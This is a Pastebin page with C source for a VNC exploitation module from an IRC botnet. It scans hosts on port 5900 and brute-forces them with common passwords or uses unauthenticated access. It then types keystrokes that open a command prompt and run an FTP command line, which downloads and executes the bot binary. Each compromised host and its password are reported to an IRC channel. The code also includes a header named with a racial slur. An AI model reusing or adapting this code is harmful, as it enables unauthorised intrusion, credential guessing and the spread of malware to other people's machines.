Advertisement
FlyFar

vncexploit.c

Dec 23rd, 2023
775
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 6.00 KB | Cybersecurity | 0 0
  1. /*
  2.  *      vncexploit.c 2007 Ravo_5002
  3.  *      This code is for educational purposes only...
  4.  *      Took some code from dej and from tightvnc :)
  5.  */
  6.  
  7. #include <stdio.h>
  8. #include <winsock.h>
  9. #include <windows.h>
  10.  
  11. #include "vncexploit.h"
  12. #include "niggerbot.h"
  13. #include "config.h"
  14. #include "d3des.h"
  15.  
  16. void SendKey(SOCKET sock, char bkey, char key, int state)
  17. {
  18.    char sendkey[8];
  19.  
  20.    // compose packet
  21.    memset(sendkey, '\x04', 1);
  22.  
  23.    if (state == 0 || state == 1)
  24.       memset(sendkey + 1, state, 1);
  25.    else
  26.       memset(sendkey + 1, 1, 1);
  27.  
  28.    memset(sendkey + 2, 0, 4);
  29.    memset(sendkey + 6, bkey, 1);
  30.    memset(sendkey + 7, key, 1);
  31.  
  32.    send(sock, sendkey, sizeof(sendkey), 0);
  33.  
  34.    if (state > 1)
  35.    {
  36.       memset(sendkey + 1, 0, 1);
  37.       send(sock, sendkey, sizeof(sendkey), 0);
  38.    }
  39. }
  40.  
  41. void VNCRoot(SOCKET sVNC, char *ftp) {
  42.    char text_cmd[] = "command";
  43.    char text_exit[] = "exit";
  44.    char bkey = '\xff',
  45.        keyctrl = '\xe3',
  46.  
  47. keyup = '\x52',
  48.        keyenter = '\x0d',
  49.        keyesc = '\x1b';
  50.    unsigned int i;
  51.  
  52.    Sleep(2000);
  53.  
  54.    //Press ENTER (in case of screensaver)
  55.    SendKey(sVNC, bkey, keyenter, 2);
  56.    Sleep(500);
  57.  
  58.    Sleep(2000);
  59. SendKey(sVNC, bkey, keyctrl, 1);
  60. SendKey(sVNC, bkey, keyesc, 1);
  61. Sleep(100);
  62. SendKey(sVNC, bkey, keyctrl, 0);
  63. SendKey(sVNC, bkey, keyesc, 0);
  64.    //If its Windows2k
  65.    
  66.    for (i = 0; i < 3; i++)
  67.    {
  68.       SendKey(sVNC, bkey, keyup, 2);
  69.       Sleep(500);
  70.    }
  71.  
  72.    //Press ENTER
  73.    SendKey(sVNC, bkey, keyenter, 2);
  74.    Sleep(2000);
  75.  
  76.    //type in "cmd"
  77.    for (i = 0; i < strlen(text_cmd); i++)
  78.    {
  79.       SendKey(sVNC, 0, text_cmd[i], 2);
  80.       Sleep(125);
  81.    }
  82.  
  83.    //press ENTER
  84.    SendKey(sVNC, bkey, keyenter, 2);
  85.    Sleep(2000);
  86.  
  87.    //send ftp line
  88.    for (i = 0; i < strlen(ftp); i++)
  89.    {
  90.       SendKey(sVNC, 0, ftp[i], 2);
  91.       Sleep(125);
  92.    }
  93.    
  94.    //press ENTER
  95.    SendKey(sVNC, bkey, keyenter, 2);
  96.    Sleep(2000);
  97.    
  98.    SendKey(sVNC, bkey, keyenter, 2);
  99.    //type in "cmd"
  100.    for (i = 0; i < strlen(text_exit); i++)
  101.    {
  102.       SendKey(sVNC, 0, text_exit[i], 2);
  103.       Sleep(125);
  104.    }
  105.       //press ENTER
  106.    SendKey(sVNC, bkey, keyenter, 2);
  107.    Sleep(2000);  
  108. }
  109.  
  110. int ReadExact(SOCKET r_sock, char *inbuf, int wanted) {
  111.  
  112.    int offset = 0;
  113.    
  114.    while (wanted > 0) {
  115.       int bytes = recv(r_sock, inbuf+offset, wanted, 0);
  116.       if ((bytes == 0) || (bytes == SOCKET_ERROR)) return 0;
  117.       wanted -= bytes;
  118.       offset += bytes;
  119.    }
  120.  
  121.    return 1;
  122. }
  123.  
  124. int WriteExact(SOCKET w_sock, char *buf, int bytes) {
  125.  
  126.    if (bytes == 0) return FALSE;
  127.  
  128.    int i = 0;
  129.     int j;
  130.  
  131.     while (i < bytes) {
  132.       j = send(w_sock, buf+i, bytes-i, 0);
  133.       if (j == SOCKET_ERROR || j==0) return 0;
  134.       i += j;
  135.     }
  136.  
  137.    return 1;
  138. }
  139.  
  140. void vncEncryptBytes(unsigned char *bytes, char *passwd) {
  141.     unsigned char key[8];
  142.     unsigned int i;
  143.  
  144.     /* key is simply password padded with nulls */
  145.  
  146.     for (i = 0; i < 8; i++) {
  147.     if (i < strlen(passwd)) {
  148.         key[i] = passwd[i];
  149.     } else {
  150.         key[i] = 0;
  151.     }
  152.     }
  153.  
  154.     deskey(key, EN0);
  155.  
  156.     for (i = 0; i < 16; i += 8) {
  157.         des(bytes+i, bytes+i);
  158.     }
  159. }
  160.  
  161. int vnccheck(char *host, char *passwd, SOCKET ircconn) {
  162.  
  163.     SOCKET sock;
  164.     SOCKADDR_IN ssin;
  165.     ssin.sin_family = AF_INET;
  166.     ssin.sin_port = htons(5900);
  167.     ssin.sin_addr.s_addr= inet_addr(host);
  168.    
  169.     sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
  170.     if(connect(sock, (LPSOCKADDR)&ssin, sizeof(ssin))) {
  171.         //printf("[-] Could not connect\n");
  172.         return 1;
  173.     }
  174.    
  175.     char buff[4096];
  176.    
  177.     char ftpline[256];
  178.     sprintf(ftpline, "echo open %s %d > ravo &echo user %s %s >> ravo &echo get %s >> ravo &echo bye >> ravo &ftp -n -v -s:ravo &del ravo &%s\r\n", getlocalip(), FTPPORT, "Ravo", "5002", BOTNAME, BOTNAME);
  179.  
  180.     unsigned char vncversion[12];
  181.     ReadExact(sock, vncversion, sizeof(vncversion));
  182.     if(strstr(vncversion, "RFB")) {
  183.         WriteExact(sock, vncversion, sizeof(vncversion));
  184.         strtok(vncversion, " ");
  185.         int versa = atoi(strtok(NULL, "."));
  186.         int versb = atoi(strtok(NULL, "\n"));
  187.         //printf("[+] Found VNC %d.%d\n", versa, versb);
  188.  
  189.         char auth[4];
  190.         ReadExact(sock, auth, 4);
  191.  
  192.         if(auth[1] == 1 || auth[3] == 1) {
  193.             //printf("[+] VNC NoAuth!\n");
  194.             sprintf(buff, "PRIVMSG %s :VNC v%d.%d with no pass on host %s\n", CHANNEL, versa, versb, host);
  195.             send(ircconn,buff, strlen(buff), 0);
  196.             WriteExact(sock, "\0", 1);
  197.             VNCRoot(sock, ftpline);
  198.             closesocket(sock);
  199.             return 1;
  200.         }
  201.         else if(auth[1] == 2 || auth[3] == 2) {
  202.             //printf("[+] VNC needs pass lets brewtf0rc3\n");
  203.             char funk[1];
  204.             //funk = "0\n";
  205.             funk[0] = auth[1];
  206.             //funk[1] = '\n';
  207.             //printf("funk:\n%s\n%d %d\n", funk, funk[0], funk[1]);
  208.            
  209.             WriteExact(sock, funk, 1);  // WTF? I NEED 2 send sumthing or ill not get the challenge
  210.             unsigned char challenge[16];
  211.             ReadExact(sock, challenge, 16);
  212.  
  213.  
  214.             vncEncryptBytes(challenge, passwd);
  215.            
  216.             WriteExact(sock, challenge, 16); // send encrypted shit
  217.            
  218.             // see wtf the status is
  219.             unsigned char status[4];
  220.             ReadExact(sock, status, 4);
  221.             if(status[3] == 0) {
  222.                 //printf("[+] pass ok\n");
  223.                 sprintf(buff, "PRIVMSG %s :[VNC] v%d.%d with pass %s on ip %s\n", CHANNEL, versa, versb, passwd, host);
  224.                 send(ircconn,buff, strlen(buff), 0);
  225.                 WriteExact(sock, "\0", 1);
  226.                 VNCRoot(sock, ftpline);
  227.                 closesocket(sock);
  228.                 return 1;
  229.             }
  230.             else if(status[3] == 1) {
  231.                 //printf("[-] pass wrong\n");
  232.                 return 0;
  233.             }
  234.             else if(status[3] == 1) {
  235.                 //printf("[-] 2much connections\n");
  236.                 return 2;
  237.             }
  238.         }
  239.         else if(auth[1] ==0) {
  240.             return 1;
  241.         }
  242.     }
  243.     closesocket(sock);
  244.     return 0;
  245. }
  246.  
  247. void vncscan(SOCKET ircconn, char *ip) {
  248.     char *passes[] = { "1234", "password", "12345678", "qwerty", "123", "vnc", "login", NULL };
  249.     int i = 0;
  250.     int status;
  251.     while(passes[i] != NULL) {
  252.         status = vnccheck(ip, passes[i], ircconn);
  253.         if(status == 1) break;
  254.         if(status == 2) Sleep(20000);
  255.         i++;
  256.         Sleep(500);
  257.     }
  258.     return;
  259. }
  260.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement